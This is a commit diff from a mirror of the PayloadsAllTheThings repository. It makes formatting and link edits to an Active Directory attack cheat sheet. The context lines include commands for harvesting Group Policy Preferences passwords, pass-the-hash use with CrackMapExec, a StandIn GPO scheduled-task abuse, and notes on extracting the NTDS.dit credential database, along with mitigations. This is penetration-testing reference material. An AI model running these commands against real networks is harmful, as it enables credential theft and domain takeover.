mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 23:02:46 +00:00
Update Active Directory Attack.md
This commit is contained in:
parent
ee53c960f0
commit
25b6003229
1 changed files with 5 additions and 5 deletions
|
@ -665,8 +665,8 @@ Requirements:
|
||||||
|
|
||||||
| Error | Message | Debug |
|
| Error | Message | Debug |
|
||||||
|--------|---------------------|------------------------------------------|
|
|--------|---------------------|------------------------------------------|
|
||||||
| 0x5 | rpc_s_access_denied | Permissions on the file in the SMB share |
|
| 0x5 | `rpc_s_access_denied` | Permissions on the file in the SMB share |
|
||||||
| 0x525 | ERROR_NO_SUCH_USER | The specified account does not exist. |
|
| 0x525 | `ERROR_NO_SUCH_USER` | The specified account does not exist. |
|
||||||
| 0x180 | unknown error code | Share is not SMB2 |
|
| 0x180 | unknown error code | Share is not SMB2 |
|
||||||
|
|
||||||
|
|
||||||
|
@ -844,7 +844,7 @@ echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aS
|
||||||
cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password
|
cme smb 10.10.10.10 -u Administrator -H 89[...]9d -M gpp_password
|
||||||
```
|
```
|
||||||
|
|
||||||
* [Get-GPPPassword](https://github.com/ShutdownRepo/Get-GPPPassword)
|
* [Get-GPPPassword](https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py)
|
||||||
```powershell
|
```powershell
|
||||||
# with a NULL session
|
# with a NULL session
|
||||||
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'
|
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'
|
||||||
|
@ -858,7 +858,7 @@ echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aS
|
||||||
|
|
||||||
#### Mitigations
|
#### Mitigations
|
||||||
|
|
||||||
* Install KB2962486 on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
|
* Install [KB2962486](https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2014/ms14-025) on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
|
||||||
* Delete existing GPP xml files in SYSVOL containing passwords.
|
* Delete existing GPP xml files in SYSVOL containing passwords.
|
||||||
* Don’t put passwords in files that are accessible by all authenticated users.
|
* Don’t put passwords in files that are accessible by all authenticated users.
|
||||||
|
|
||||||
|
@ -968,7 +968,7 @@ StandIn.exe --gpo --filter Shards --tasktype computer --taskname Liber --author
|
||||||
|
|
||||||
You will need the following files to extract the ntds :
|
You will need the following files to extract the ntds :
|
||||||
- NTDS.dit file
|
- NTDS.dit file
|
||||||
- SYSTEM hive (C:\Windows\System32\SYSTEM)
|
- SYSTEM hive (`C:\Windows\System32\SYSTEM`)
|
||||||
|
|
||||||
Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
|
Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`.
|
||||||
- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
|
- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data).
|
||||||
|
|
Loading…
Reference in a new issue